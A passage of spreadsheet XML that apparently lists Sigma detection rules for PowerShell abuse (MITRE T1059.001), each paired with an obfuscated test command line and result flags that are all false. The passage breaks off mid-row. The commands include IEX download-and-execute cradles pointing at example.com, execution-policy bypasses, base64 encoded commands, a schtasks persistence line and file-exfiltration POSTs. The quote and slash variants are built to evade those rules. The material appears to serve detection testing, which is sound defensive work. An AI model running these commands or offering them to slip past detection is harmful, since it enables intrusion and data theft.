        <v>0</v>
      </c>
    </row>
    <row r="4523" ht="15.75" customHeight="1" s="42">
      <c r="A4523" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4523" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C4523" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D4523" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E4523" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ex" Bypass -fIlE script.ps1</t>
        </is>
      </c>
      <c r="F4523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4523" s="43" t="n"/>
      <c r="J4523" s="43" t="n"/>
      <c r="K4523" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4524" ht="15.75" customHeight="1" s="42">
      <c r="A4524" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4524" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C4524" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D4524" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E4524" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ex Bypass -"File" script.ps1</t>
        </is>
      </c>
      <c r="F4524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4524" s="43" t="n"/>
      <c r="J4524" s="43" t="n"/>
      <c r="K4524" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4525" ht="15.75" customHeight="1" s="42">
      <c r="A4525" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4525" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C4525" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D4525" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E4525" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ex" Bypass -FilE script.ps1</t>
        </is>
      </c>
      <c r="F4525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4525" s="43" t="n"/>
      <c r="J4525" s="43" t="n"/>
      <c r="K4525" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4526" ht="15.75" customHeight="1" s="42">
      <c r="A4526" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4526" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C4526" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D4526" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E4526" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ex" Bypass -f script.ps1</t>
        </is>
      </c>
      <c r="F4526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4526" s="43" t="n"/>
      <c r="J4526" s="43" t="n"/>
      <c r="K4526" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4527" ht="15.75" customHeight="1" s="42">
      <c r="A4527" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4527" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_policies_to_unsecure_level</t>
        </is>
      </c>
      <c r="C4527" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level</t>
        </is>
      </c>
      <c r="D4527" s="43" t="inlineStr">
        <is>
          <t>87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180</t>
        </is>
      </c>
      <c r="E4527" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eX Bypass -"File" script.ps1</t>
        </is>
      </c>
      <c r="F4527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4527" s="43" t="n"/>
      <c r="J4527" s="43" t="n"/>
      <c r="K4527" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4528" ht="15.75" customHeight="1" s="42">
      <c r="A4528" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4528" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C4528" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D4528" s="43" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E4528" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F4528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4528" s="43" t="n"/>
      <c r="J4528" s="43" t="n"/>
      <c r="K4528" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4529" ht="15.75" customHeight="1" s="42">
      <c r="A4529" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4529" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C4529" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D4529" s="43" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E4529" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F4529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4529" s="43" t="n"/>
      <c r="J4529" s="43" t="n"/>
      <c r="K4529" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4530" ht="15.75" customHeight="1" s="42">
      <c r="A4530" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4530" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C4530" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D4530" s="43" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E4530" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F4530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4530" s="43" t="n"/>
      <c r="J4530" s="43" t="n"/>
      <c r="K4530" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4531" ht="15.75" customHeight="1" s="42">
      <c r="A4531" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4531" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C4531" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D4531" s="43" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E4531" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "I`EX ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F4531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4531" s="43" t="n"/>
      <c r="J4531" s="43" t="n"/>
      <c r="K4531" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4532" ht="15.75" customHeight="1" s="42">
      <c r="A4532" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4532" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C4532" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D4532" s="43" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E4532" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "I`EX ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F4532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4532" s="43" t="n"/>
      <c r="J4532" s="43" t="n"/>
      <c r="K4532" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4533" ht="15.75" customHeight="1" s="42">
      <c r="A4533" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4533" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C4533" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D4533" s="43" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E4533" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "IEX (Invoke-RestMethod -Uri 'http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F4533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4533" s="43" t="n"/>
      <c r="J4533" s="43" t="n"/>
      <c r="K4533" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4534" ht="15.75" customHeight="1" s="42">
      <c r="A4534" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4534" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C4534" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D4534" s="43" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E4534" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F4534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4534" s="43" t="n"/>
      <c r="J4534" s="43" t="n"/>
      <c r="K4534" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4535" ht="15.75" customHeight="1" s="42">
      <c r="A4535" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4535" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C4535" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D4535" s="43" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E4535" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F4535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4535" s="43" t="n"/>
      <c r="J4535" s="43" t="n"/>
      <c r="K4535" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4536" ht="15.75" customHeight="1" s="42">
      <c r="A4536" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4536" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C4536" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D4536" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E4536" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "&amp; 'C:\Users\Default\AppData\Local\payload.ps1'"</t>
        </is>
      </c>
      <c r="F4536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4536" s="43" t="n"/>
      <c r="J4536" s="43" t="n"/>
      <c r="K4536" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4537" ht="15.75" customHeight="1" s="42">
      <c r="A4537" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4537" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C4537" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D4537" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E4537" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "&amp; 'C:\Users\Default\AppData\Local\payload.ps1'"</t>
        </is>
      </c>
      <c r="F4537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4537" s="43" t="n"/>
      <c r="J4537" s="43" t="n"/>
      <c r="K4537" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4538" ht="15.75" customHeight="1" s="42">
      <c r="A4538" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4538" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C4538" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D4538" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E4538" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; {Invoke-Expression (Get-Content $env:APPDATA\script.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F4538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4538" s="43" t="n"/>
      <c r="J4538" s="43" t="n"/>
      <c r="K4538" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4539" ht="15.75" customHeight="1" s="42">
      <c r="A4539" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4539" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C4539" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D4539" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E4539" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SUVYIChHZXQtQ29udGVudCBDOlxVc2Vyc1xQdWJsaWNcQXBwRGF0YVxMb2NhbFxwYXlsb2FkLnBzMSk=</t>
        </is>
      </c>
      <c r="F4539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4539" s="43" t="n"/>
      <c r="J4539" s="43" t="n"/>
      <c r="K4539" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4540" ht="15.75" customHeight="1" s="42">
      <c r="A4540" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4540" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C4540" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D4540" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E4540" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENCodEDcOMmANd SUVYIChHZXQtQ29udGVudCBDOlxVc2Vyc1xQdWJsaWNcQXBwRGF0YVxMb2NhbFxwYXlsb2FkLnBzMSk=</t>
        </is>
      </c>
      <c r="F4540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4540" s="43" t="n"/>
      <c r="J4540" s="43" t="n"/>
      <c r="K4540" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4541" ht="15.75" customHeight="1" s="42">
      <c r="A4541" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4541" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C4541" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D4541" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E4541" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SUVYIChHZXQtQ29udGVudCBDOlxVc2Vyc1xQdWJsaWNcQXBwRGF0YVxMb2NhbFxwYXlsb2FkLnBzMSk=</t>
        </is>
      </c>
      <c r="F4541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4541" s="43" t="n"/>
      <c r="J4541" s="43" t="n"/>
      <c r="K4541" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4542" ht="15.75" customHeight="1" s="42">
      <c r="A4542" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4542" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C4542" s="43" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D4542" s="43" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E4542" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" SUVYIChHZXQtQ29udGVudCBDOlxVc2Vyc1xQdWJsaWNcQXBwRGF0YVxMb2NhbFxwYXlsb2FkLnBzMSk=</t>
        </is>
      </c>
      <c r="F4542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4542" s="43" t="n"/>
      <c r="J4542" s="43" t="n"/>
      <c r="K4542" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4543" ht="15.75" customHeight="1" s="42">
      <c r="A4543" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4543" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_webclient_casing</t>
        </is>
      </c>
      <c r="C4543" s="43" t="inlineStr">
        <is>
          <t>Net WebClient Casing Anomalies</t>
        </is>
      </c>
      <c r="D4543" s="43" t="inlineStr">
        <is>
          <t>c86133ad-4725-4bd0-8170-210788e0a7ba</t>
        </is>
      </c>
      <c r="E4543" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" TgBlAHcALQBPAGIAagBlAGMAdAAgAG4AYABFAHQALgBXAGABRQBiAEMAbABpAEUAbgBUAA==</t>
        </is>
      </c>
      <c r="F4543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4543" s="43" t="n"/>
      <c r="J4543" s="43" t="n"/>
      <c r="K4543" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4544" ht="15.75" customHeight="1" s="42">
      <c r="A4544" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4544" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_webclient_casing</t>
        </is>
      </c>
      <c r="C4544" s="43" t="inlineStr">
        <is>
          <t>Net WebClient Casing Anomalies</t>
        </is>
      </c>
      <c r="D4544" s="43" t="inlineStr">
        <is>
          <t>c86133ad-4725-4bd0-8170-210788e0a7ba</t>
        </is>
      </c>
      <c r="E4544" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" TgBlAHcALQBPAGIAagBlAGMAdAAgAG4AYABFAHQALgBXAGABRQBiAEMAbABpAEUAbgBUAA==</t>
        </is>
      </c>
      <c r="F4544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4544" s="43" t="n"/>
      <c r="J4544" s="43" t="n"/>
      <c r="K4544" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4545" ht="15.75" customHeight="1" s="42">
      <c r="A4545" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4545" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_appdata_local_system</t>
        </is>
      </c>
      <c r="C4545" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Execution AppData Folder</t>
        </is>
      </c>
      <c r="D4545" s="43" t="inlineStr">
        <is>
          <t>c5c00f49-b3f9-45a6-997e-cfdecc6e1967</t>
        </is>
      </c>
      <c r="E4545" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\..\Admin\AppData\Local &amp;&amp; schtasks /Create /TN "UpdateTask" /TR "payload.exe" /SC ONSTART /RU SYSTEM"</t>
        </is>
      </c>
      <c r="F4545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4545" s="43" t="n"/>
      <c r="J4545" s="43" t="n"/>
      <c r="K4545" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4546" ht="15.75" customHeight="1" s="42">
      <c r="A4546" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4546" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_data_exfiltration_via_cli</t>
        </is>
      </c>
      <c r="C4546" s="43" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D4546" s="43" t="inlineStr">
        <is>
          <t>7d1aaf3d-4304-425c-b7c3-162055e0b3ab</t>
        </is>
      </c>
      <c r="E4546" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$content = gc C:\Windows\System32\notepad.exe; curl http://127.0.0.1 -method POST -body $content}</t>
        </is>
      </c>
      <c r="F4546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4546" s="43" t="n"/>
      <c r="J4546" s="43" t="n"/>
      <c r="K4546" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4547" ht="15.75" customHeight="1" s="42">
      <c r="A4547" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4547" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_data_exfiltration_via_cli</t>
        </is>
      </c>
      <c r="C4547" s="43" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D4547" s="43" t="inlineStr">
        <is>
          <t>7d1aaf3d-4304-425c-b7c3-162055e0b3ab</t>
        </is>
      </c>
      <c r="E4547" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$content = Get-Content C:\Windows\System32\notepad.exe; [System.Net.HttpWebRequest]::Create("http://127.0.0.1") | % {$_.Method="POST"; $writer = [System.IO.StreamWriter]$_.GetRequestStream(); $writer.Write($content); $writer.Close(); $_.GetResponse().Close()}}</t>
        </is>
      </c>
      <c r="F4547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4547" s="43" t="n"/>
      <c r="J4547" s="43" t="n"/>
      <c r="K4547" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4548" ht="15.75" customHeight="1" s="42">
      <c r="A4548" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4548" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4548" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4548" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4548" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy bypass -"c" "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F4548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4548" s="43" t="n"/>
      <c r="J4548" s="43" t="n"/>
      <c r="K4548" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4549" ht="15.75" customHeight="1" s="42">
      <c r="A4549" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4549" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_embed_exe_lnk</t>
        </is>
      </c>
      <c r="C4549" s="43" t="inlineStr">
        <is>
          <t>Hidden Powershell in Link File Pattern</t>
        </is>
      </c>
      <c r="D4549" s="43" t="inlineStr">
        <is>
          <t>30e92f50-bb5a-4884-98b5-d20aa80f3d7a</t>
        </is>
      </c>
      <c r="E4549" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /"nop" -"ep" bypass /"c" "Invoke-Expression 'payload'"</t>
        </is>
      </c>
      <c r="F4549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4549" s="43" t="b">
